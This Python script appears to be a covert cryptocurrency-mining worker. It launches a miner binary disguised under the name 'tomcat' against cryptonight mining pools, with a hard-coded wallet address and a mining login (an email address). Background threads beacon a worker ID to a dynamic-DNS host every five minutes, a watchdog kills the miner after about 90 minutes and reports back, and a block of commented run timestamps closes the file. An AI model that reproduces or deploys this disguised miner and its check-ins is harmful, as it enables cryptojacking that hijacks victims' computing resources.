import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 15:39:07.244124
#2018-02-17 17:29:06.439402
#2018-02-17 19:18:04.040447
#2018-02-17 21:09:06.446479
#2018-02-17 22:53:04.491171
#2018-02-18 00:37:06.093820
#2018-02-18 02:27:05.203749
#2018-02-18 04:14:05.229736
#2018-02-18 06:05:03.821155
#2018-02-18 07:54:07.364915
#2018-02-18 09:43:08.453639
#2018-02-18 11:29:05.733907
#2018-02-18 13:15:04.120118
#2018-02-18 15:03:01.340279
#2018-02-18 16:51:03.631301
#2018-02-18 18:38:06.650658
#2018-02-18 20:26:07.688300
#2018-02-18 22:12:05.678558
#2018-02-19 00:01:03.339132
#2018-02-19 01:46:07.323411
#2018-02-19 03:36:06.551368
#2018-02-19 05:20:09.441069
#2018-02-19 07:07:01.672195
#2018-02-19 08:56:01.642476
#2018-02-19 10:46:06.111969
#2018-02-19 12:35:06.682705
#2018-02-19 14:22:06.001255
#2018-02-19 16:09:10.432505
#2018-02-19 17:56:06.470098
#2018-02-19 19:42:07.452214
#2018-02-19 21:29:07.702333
#2018-02-19 23:15:08.443373
#2018-02-20 00:59:05.550224
#2018-02-20 02:49:01.932270
#2018-02-20 04:37:06.134105
#2018-02-20 06:21:06.521489
#2018-02-20 08:06:07.866196
#2018-02-20 09:52:04.149582
#2018-02-20 11:35:09.970871
#2018-02-20 13:22:04.512415
#2018-02-20 15:07:04.187192
#2018-02-20 16:51:09.877499
#2018-02-20 18:39:08.202223
#2018-02-20 20:31:04.921092
#2018-02-20 22:15:08.037034
#2018-02-20 23:55:09.196068
#2018-02-21 01:39:08.932152
#2018-02-21 03:25:07.905123
#2018-02-21 05:12:04.431546
#2018-02-21 06:59:06.877734
#2018-02-21 08:46:05.728480
#2018-02-21 10:34:04.621932
#2018-02-21 12:22:05.337672
#2018-02-21 14:09:02.192547
#2018-02-21 15:56:11.478991
#2018-02-21 17:47:08.824100
#2018-02-21 19:32:04.671168
#2018-02-21 21:19:06.051380
#2018-02-21 23:07:04.946169
#2018-02-22 00:56:01.220307
#2018-02-22 02:42:07.235673
#2018-02-22 04:29:03.811751
#2018-02-22 06:15:07.115055
#2018-02-22 07:59:08.318483
#2018-02-22 09:48:05.533369
#2018-02-22 11:34:01.993291
#2018-02-22 13:22:01.484984
#2018-02-22 15:09:06.580323
#2018-02-22 16:52:10.675709
#2018-02-22 18:41:04.136235
#2018-02-22 20:32:08.689570
#2018-02-22 22:19:05.186430
#2018-02-23 00:05:05.872489
#2018-02-23 01:53:04.806046
#2018-02-23 03:45:11.208610
#2018-02-23 05:33:03.539349
#2018-02-23 07:18:04.538751
#2018-02-23 09:22:07.830341
#2018-02-23 11:28:08.229705
#2018-02-23 13:18:01.607211
#2018-02-23 15:03:09.063765
#2018-02-23 16:53:08.021905
#2018-02-23 18:39:01.369615
#2018-02-23 20:25:01.434757
#2018-02-23 22:12:07.793573
#2018-02-23 23:59:05.471880
#2018-02-24 01:50:05.219088
#2018-02-24 03:35:06.887597
#2018-02-24 05:19:05.796695
#2018-02-24 07:07:03.462580
#2018-02-24 08:54:02.164272
#2018-02-24 10:53:06.241681
#2018-02-24 12:40:08.660170
#2018-02-24 14:28:07.289650
#2018-02-24 16:16:01.737439
#2018-02-24 18:08:01.883682
#2018-02-24 19:54:06.592242
#2018-02-24 21:38:05.012024
#2018-02-25 01:58:04.168312
#2018-02-25 05:48:05.682597
#2018-02-25 11:37:08.145862